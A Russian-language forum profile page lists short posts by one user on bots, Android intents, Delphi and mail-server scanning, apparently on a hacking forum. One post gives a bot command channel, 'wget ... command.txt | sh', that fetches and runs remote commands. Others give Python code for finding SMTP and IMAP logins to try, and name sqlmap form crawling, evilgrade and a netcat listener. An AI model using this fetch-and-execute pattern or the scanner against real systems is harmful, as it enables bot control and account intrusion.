Перейти к содержанию

xfrzx

Пользователь
  • Публикаций

    17
  • Зарегистрирован

  • Посещение

Репутация

84 Excellent

Информация о xfrzx

  • Звание
    Rank №2
  1. Попробуй hxxp://finder.insidepro.com/ - халява У них есть клиент под win,там удобнее ,но за символическую плату
  2. мини бот си (линукс)

    Костыль https://linux.die.net/man/1/timeout :) wget'том не обязательно сохранять wget -q -O http://127.0.0.1/commands.txt | grep BLALALA etc... Либо в одну строку вся логика wget -q -O- http://localhost/command.txt | sh а в command.txt уже нужная комманда через
  3. Непонятки с USER_PRESENT

    Спасибо за инфу, примерно так и думал,но были сомнения. В итоге сделал еще одно приложение без сервисов для тестов, всё окей ,стучит как надо. Т.е. у меня выходит так: Нет сервисов - ничего не прибивается ОС - Широковещательные сообщения ловятся как надо. Есть сервис - работает криво. Судя по всему всё так как ты и описал. Да там всё по стандарту,по докам.
  4. Непонятки с USER_PRESENT

    Привет, вопрос к андроид кодерам, не могу разобраться почему так Первое приложение без сервисов и тд.Ловит android.intent.action.USER_PRESENT отлично. Второе приложение уже с сервисами и ловит android.intent.action.USER_PRESENT один раз из 10 наверное,судя по стате. Почему так происходит? Это из-за андройдовской оптимизации батарейки? пришибает ОС второе приложние и не ловит android.intent.action.USER_PRESENT? permission примерно одинаковые, SDK 25
  5. Delphi CriticalSection

    А присваивать form1.label8.caption:=inttostr(ch); по таймеру раз в секунду в основном потоке не вариант? Не так плавно будут цифры идти конечно,но это ж не главное. Если я правильно понял что нужно.
  6. Вообще не понимаю ценообразования, модули все готовые. Там надо скан порта 50 строк максимум,smtplib,небольшая логика и многопоток, все. 150 баксов масимум и то я считаю это овер. Понятное дело что можно написать свой велосипед для авторизации и тд, но в большистве случаев лучше не получится. Код на коленке: #!/usr/bin/env python2 #encoding: UTF-8 import socket def scan_port(server,port): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.settimeout(1) try: sock.connect((server, port)) data = sock.recv(4) except: return 0 sock.close() if (data=='220 '): # SMTP return(server ":" str(port)) elif (data=='* OK'): if (port == 143): #IMAP return (server,port,'imap') elif (port == 993): #IMAPS return (server,port,'imaps') elif (data==' OK '): if (port == 110): #POP3 return (server,port,'pop3') if (port == 995): #POPS return (server,port,'pop3s') return 0 Читаем 4 байта,смотрим что там и от этого отталкиваемся что это
  7. У меня так: ports_smtp = [465,587,25,2525] #Нужные порты prefix = ["mail.","smtp.",] ports_imap = [993,143,110,995] #Нужные порты prefix_imap =['mail.','imap.','pop.','pop3.'] Только попытка авторизации сперва. Но sqlite меня достал и я забил на этот софт. Вообще полно готовых библиотек под питон для smtp/pop3 и тд
  8. Исходники каспера

    Учишься в сфере IT овер 999лет -> Ждешь вакансию -> Проходишь собеседование -> Сливаешь 2 года файлы -> Выкладываешь -> Попадаешь под статью -> В чем профит?? Упорный паренек или девушка) Очередной разоблачитель шпионажа чтоле?
  9. Отстук хорошо,но если хитрожопый клиент просто закомментит проверку на РУ сегмент?) Или панели у Вас на серверах стоят?
  10. Посмотри куда льет, сделай также, там явно плюсовая схема. Помониторить, посмотреть куда льют, это ж "бесплатная" инфа. А уже после слить если нужно, но по мне - "бесплатная" инфа куда ценнее. Там явно не простой арбитражник сидит.
  11. Наверное ты про hxxps://github.com/infobyte/evilgrade Судя по всему недавно даже обновлялся.
  12. Sqlmap умеет кравлить сайт и искать уязвимые формы --crawl=CRAWLDEPTH Crawl the website starting from the target URL --forms Parse and test forms on target URL Естественно это все не быстро и насчет ajax тоже врядли. Либо собираешь урл с формами ,например а-парсером, а после скармливаешь sqlmap'у будет побыстрее. Либо посмотри в сторону Arachni например. Правда это уже не совсем дорки.
  13. За натом наверное сидишь. Попробуй прокинуть порт. PS Там где "C://nc/nc -lvp 3137" делаешь.
  14. Ping это утилита которая шлет ICMP Echo-Request. Судя по: Видимо ты имеешь ввиду http запрос, там да, сервер отдает хидер вроде: Делайте 104.210.34.116 > 104.210.34.0/24 и сканьте этот диап, но этом было выше. Можете попробовать гнянуть тут: hxxps://bgp.he.net/search?search[search]=vodafone
  15. Это в формате .sql? Если да, то советую сжать, даст большой выигрыш в размере. По сути это текстовик. zip,tar и тд
×